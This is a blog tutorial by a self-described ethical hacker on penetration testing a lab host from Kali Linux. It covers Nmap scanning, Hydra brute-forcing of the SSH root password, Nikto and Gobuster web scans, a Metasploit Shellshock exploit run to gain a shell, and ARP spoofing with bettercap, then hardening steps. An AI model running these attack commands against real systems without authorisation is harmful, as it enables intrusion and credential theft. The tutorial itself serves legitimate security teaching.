Mastering Local Network Penetration Testing: An Ethical Hacking Guide with Kali Linux
Ethical Hacking & Security Hardening: Penetration Testing in a Local Network Using Kali Linux
Author: Kiran Kumar K
Cybersecurity Analyst | Ethical Hacker | Kali Linux Practitioner
Introduction
As the cybersecurity landscape continues to evolve, proactive system defense is more critical than ever. One of the most effective ways to protect systems is by performing penetration testing within your own network to identify potential vulnerabilities before malicious actors do.
In this blog post, I will walk through a full penetration testing scenario where I test and secure a target device (10.8.56.6
) from a Kali Linux machine (10.8.56.1
) in the same network. This demonstration is intended to educate cybersecurity professionals and students on how to ethically assess and harden systems.
Disclaimer: This article is for educational purposes only. Always ensure you have permission before testing any system. All examples below were conducted in a safe lab environment with full authorization.
Lab Setup
Device | IP Address | Description |
---|---|---|
Kali Linux (Attacker) | 10.8.56.1 | Used to perform the penetration test |
Target System | 10.8.56.6 | A vulnerable device to test and secure |
The process involves four major stages:
-
Reconnaissance
-
Enumeration
-
Exploitation
-
Remediation and Hardening
Step 1: Reconnaissance
The first phase involves gathering information about the target, such as open ports, running services, and operating system details. For this, we use Nmap, a powerful network scanning tool.
Command:
nmap -sS -sV -O 10.8.56.6
Flags Explained:
-
-sS
: TCP SYN scan (stealthy and fast) -
-sV
: Attempts to determine service versions -
-O
: Tries to identify the operating system
Sample Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu
80/tcp open http Apache httpd 2.4.18
3306/tcp open mysql MySQL 5.7.12
This information tells us that the device is running SSH, a web server (Apache), and a MySQL database. These are potential targets for exploitation.
Step 2: Service Enumeration
Once services are identified, we enumerate them to discover weaknesses, misconfigurations, or vulnerabilities.
SSH (Port 22)
Test for weak or default credentials using Hydra:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.8.56.6
If the root password is weak, this could allow unauthorized access.
Web Server (Port 80)
We use Nikto to scan for vulnerabilities in the Apache web server:
nikto -h http://10.8.56.6
For deeper analysis, use Gobuster to enumerate directories:
gobuster dir -u http://10.8.56.6 -w /usr/share/wordlists/dirb/common.txt
To manually inspect vulnerabilities like SQL injection, XSS, or insecure file uploads, use Burp Suite to intercept and manipulate HTTP requests.
MySQL (Port 3306)
If the MySQL port is open and credentials are known or default, you can attempt a login:
mysql -h 10.8.56.6 -u root -p
Inside the database, you may find sensitive information or insecure configurations.
Step 3: Exploitation
If a vulnerable version of a service is found, search for publicly available exploits.
Using SearchSploit:
searchsploit apache 2.4.18
Exploiting with Metasploit:
Start Metasploit:
msfconsole
Use a known exploit (example for Apache):
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST 10.8.56.6
set TARGETURI /
run
Once exploitation is successful, you may obtain shell access to the device.
Post-exploitation actions could include checking for privilege escalation opportunities, system misconfigurations, and sensitive files.
Step 4: Securing the Target Device
After identifying vulnerabilities, it is essential to secure the target system against potential attacks. Below are the recommended hardening techniques.
1. Disable Unnecessary Services
Stop services like Telnet, FTP, or SMB if not required:
sudo systemctl disable telnet
2. Change Default Passwords
Ensure that all user and database accounts use strong, unique passwords.
3. Configure a Firewall (UFW Example)
sudo apt install ufw
sudo ufw default deny incoming
sudo ufw allow 22
sudo ufw enable
Allow only the necessary ports and block the rest.
4. Install Fail2Ban
Protect against brute-force attacks:
sudo apt install fail2ban
sudo systemctl enable fail2ban
5. Regular Updates
Always keep the system and services up to date:
sudo apt update && sudo apt upgrade
Patch known vulnerabilities as soon as security updates are available.
Optional: Man-in-the-Middle (MitM) Simulation
If both devices are on the same subnet, you can test ARP spoofing or DNS spoofing using tools like Ettercap or Bettercap:
bettercap -iface eth0
Use this to inspect traffic and identify unsecured protocols.
Summary of Tools Used
Task | Tool | Description |
---|---|---|
Port Scanning | Nmap | Identifies open ports and OS |
Service Enumeration | Nikto, Gobuster, Hydra | Analyzes services and brute-force |
Web App Testing | Burp Suite | Manual vulnerability testing |
Exploitation | Metasploit, SearchSploit | Executes known exploits |
Hardening | UFW, Fail2Ban | Secures the target post-assessment |
Final Thoughts
By thinking like an attacker, cybersecurity professionals can proactively discover and patch system vulnerabilities before they are exploited. This hands-on approach using Kali Linux provides a clear understanding of how attackers work — and more importantly, how to defend against them.
Understanding penetration testing is not about destruction — it's about building stronger defenses, writing better code, and protecting user data.
About the Author
Kiran Kumar K
Cybersecurity Analyst | Ethical Hacker | Linux Enthusiast
GitHub: github.com/KIRAN-KUMAR-K3
LinkedIn: linkedin.com/in/kiran-kumar-k3